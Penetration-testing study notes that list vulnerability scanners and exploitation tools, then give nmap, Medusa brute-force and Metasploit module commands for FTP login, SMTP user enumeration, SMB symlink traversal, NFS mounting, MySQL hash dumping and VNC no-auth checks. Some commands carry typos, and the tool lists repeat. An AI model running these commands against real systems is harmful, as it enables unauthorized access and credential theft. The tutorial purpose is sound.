Automated Tools

The top 10 vulnerability scanners

sectools.org

Nessus (open source/commercial)

OpenVAS (open source)

Core Impact (commercial)

Nexpose (commercial)

GFI LanGuard (commercial)

QualysGuard (commercial)

MBSA (open source)

Retina (commercial)

Secunia PSI (open source)

Nipper (commercial)

Vulnerability exploitation tools

sectools.org

Metasploit (open source/commercial)

Core Impact (commercial)

sqlmap (open source)

Canvas (commercial)

Netsparker (commercial)

Nmap Scripts

To invoke these scripts, we need to use the -A flag

nmap -A 10.0.3.125

Frequent issue: The use of default or weak passwords on applications

There are multiple tools we can use: Medusa, Hydra...

#> medusa –h <targetIP> -u root -p password -e ns -O mysql.medusa.out –M mysql

OpenVAS

JBroFuzz

Fuzzing is a process where random data are passed to an application in the hopes that an anomaly will be detected

Fuzzing can take quite a while to complete

We can use a fuzzer whenever we discover a place to insert user-supplied data in an application

Metasploit

FTP

use auxiliary/scanner/ftp/anonymous

auxiliary/scanner/ftp/ftp_login

Simple Mail Transfer Protocol

can be used to identify usernames on a target system or within the organization

User enumeration via SMTP

use auxiliary/scanner/smtp/smtp_enum

show options

set RHOST 192.168.1.123

run

Once we have this information, we can attempt to find passwords for each user

launch bogus e-mails as the root user (Social Engineering)

Server Message Block

SMB user enumeration

use auxiliary/scanner/smb/smb_enumshares

Brute-force of “msfadmin” password.

Creating link to remote file share.

use auxiliary/admin/smb/samba_symlink_traversal

show options

set SMESHARE tmp

exploit

Logging onto the remote system’s/root directory.

Network File Shares

We can scan for Network File Shares (NFS)

using the “nsfmount” module in Metasploit

use auxiliary/scanner/nfs/nfsmount

show options

set RHOTS

run

MySQL

auxiliary/scanner/mysql/mysql_login module

overlooking for login data

grab the hashes stored in the MySQL

use auxiliary/scanner/mysql/mysql_hashdump

show options

set RHOST

run

PostgreSQL

postgres_login module

auxiliary/scanner/postgres/postgres_schemadump

Metasploit also has modules for Oracle as well

VNC

use auxiliary/scanner/vnc/vnc_none_auth

show options

st RHOST

set USERNAME root

run

Automated Tools

The top 10 vulnerability scanners

Nessus (open source/commercial)

OpenVAS (open source)

Core Impact (commercial)

Nexpose (commercial)

GFI LanGuard (commercial)

QualysGuard (commercial)

MBSA (open source)

Retina (commercial)

Secunia PSI (open source)

Nipper (commercial)

Vulnerability exploitation tools

Metasploit (open source/commercial)

Core Impact (commercial)

sqlmap (open source)

Canvas (commercial)

Netsparker (commercial)

Nmap Scripts

usr/share/nmap/scripts

To invoke these scripts, we need to use the -A flag

nmap -A 10.0.3.125

Default Login Scans

Frequent issue: The use of default or weak passwords on applications

There are multiple tools we can use: Medusa, Hydra...

#> medusa –h <targetIP> -u root -p password -e ns -O mysql.medusa.out –M mysql

OpenVAS

JBroFuzz

Fuzzing is a process where random data are passed to an application in the hopes that an anomaly will be detected

Fuzzing can take quite a while to complete

We can use a fuzzer whenever we discover a place to insert user-supplied data in an application

Metasploit

FTP

Simple Mail Transfer Protocol

Server Message Block

Network File Shares

MySQL

PostgreSQL

VNC

Never trust a tool and use more than one for each task

results matching ""

No results matching ""